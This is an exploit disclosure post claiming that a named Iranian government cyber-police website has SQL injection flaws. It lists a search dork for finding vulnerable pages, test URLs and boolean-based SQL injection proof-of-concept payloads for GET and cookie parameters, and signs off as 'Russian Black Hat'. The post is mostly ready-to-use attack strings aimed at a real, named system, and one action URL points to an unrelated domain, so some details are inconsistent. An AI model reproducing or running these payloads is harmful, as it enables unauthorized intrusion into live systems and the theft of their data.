This site belongs to the Iranian Cyber Police (پلیس فضای تولید و تبادل اطلاعات فراجا) (fata), which has a security problem with the SQL INJECTION Vulnerability "CWE-89". We have repeatedly reported to this site that it has a security problem and has ignored our report. We want to record this security issue ######################################################################################################################### # # # Exploit Title : "Iranian Cyber Police has an SQL Injection vulnerability." # # "Vulners AI Score: 7.8. Confidence level: High." # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : https://csirc.fata.gov.ir/ # # # # Security Risk : Medium # # # # Description : All target's IRanian Military websites # # # # DorK : ""inurl:/page/news-details?id=" "site:fata.gov.ir/page/news-details?id=" # # # ######################################################################################################################### # # # Expl0iTs: # # # # address (refer url): https://csirc.fata.gov.ir/page/news # # vulnerabillity : GET SQL INJECT BOOLEAN Based string # # action url: https://csirc.fata.gov.ir/page/news-details?id=100014%22 # action url: https://csirc.fata.gov.ir/page/news-details?id=%22100014 # action url: https://csirc.fata.gov.ir/page/news-details?id=100014%27 -------------------------------------------------- # # vuln type : SQLInjection # # refer address :https://csirc.fata.gov.ir/page/news-details?id=100014 # # request type : COOKIE # # action url : https://csirc.fata.gov.ir/page/news-details?id=100014 # parameter : service_id # # description : COOKIE SQL INJECTION BooleanBased String # # POC : https://csirc.fata.gov.ir/page/news-details?id=100014&^service_id=9%27) aNd 8634682=8634682 aNd (%276199%27)=(%276199 --------------------------------------- # vuln type : SQLInjection # # refer address : https://csirc.fata.gov.ir/page/news-details?id=100014 # # request type : GET # # action url : https://gerdab.ir/fa/archive?sec_id=63&service_id=9 # # parameter : service_id # # description : GET SQL INJECTION BooleanBased Integer # # POC : https://csirc.fata.gov.ir/page/news-details?id=.&service_id=9 RLIKE (case when 8446715=8446715 then 0x74657374696E70757476616C7565 else 0x28 end) # # # # # ######################################################################################################################### # # # | Security Is JOCK | # # # # | Russian Black Hat | # # # #########################################################################################################################